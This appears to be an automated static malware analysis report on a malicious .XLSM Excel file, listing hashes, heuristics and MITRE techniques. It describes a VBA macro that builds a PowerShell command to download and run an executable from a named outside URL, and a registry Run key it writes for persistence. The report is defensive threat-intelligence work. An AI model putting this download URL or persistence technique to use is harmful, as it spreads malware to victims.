Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 a53d910177170c5b…

MALICIOUS

Office (OOXML) / .XLSM

52.1 KB Created: 2022-01-04 14:11:58 UTC Authoring application: Microsoft Excel 15.0300
MD5: d96c08a5155262263e848f6aeb2bc0fd SHA-1: 5dee76a2832edaa48829d3e702aaf3a8f16626c2 SHA-256: a53d910177170c5b3db633cd8a6f76816eace62d5b5ea5d86ba3240bfd7ba197
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell

The critical heuristic OLE_VBA_SHELL indicates that the VBA macro attempts to execute a command. The script reconstructs a PowerShell command to download and execute a file from 'http://dd8.data.hu/get/356815/13148200/joge.exe' and saves it as 'C:\Users\Public\AppData\Public\jigibpqikaxnohadbjcsmah.exe'. It also attempts to establish persistence by writing to the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'.

Heuristics 2

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
e6347d5ab22f186f308780ccce3bd228cd0a49cf63125928ea3093c527c68693		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2344 bytes
vbaProject_00.bin
aceb92196a772b57b1fd15bd01ae6e6d9dba0ae666ad043544d24a6ef4a1c25e		 vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.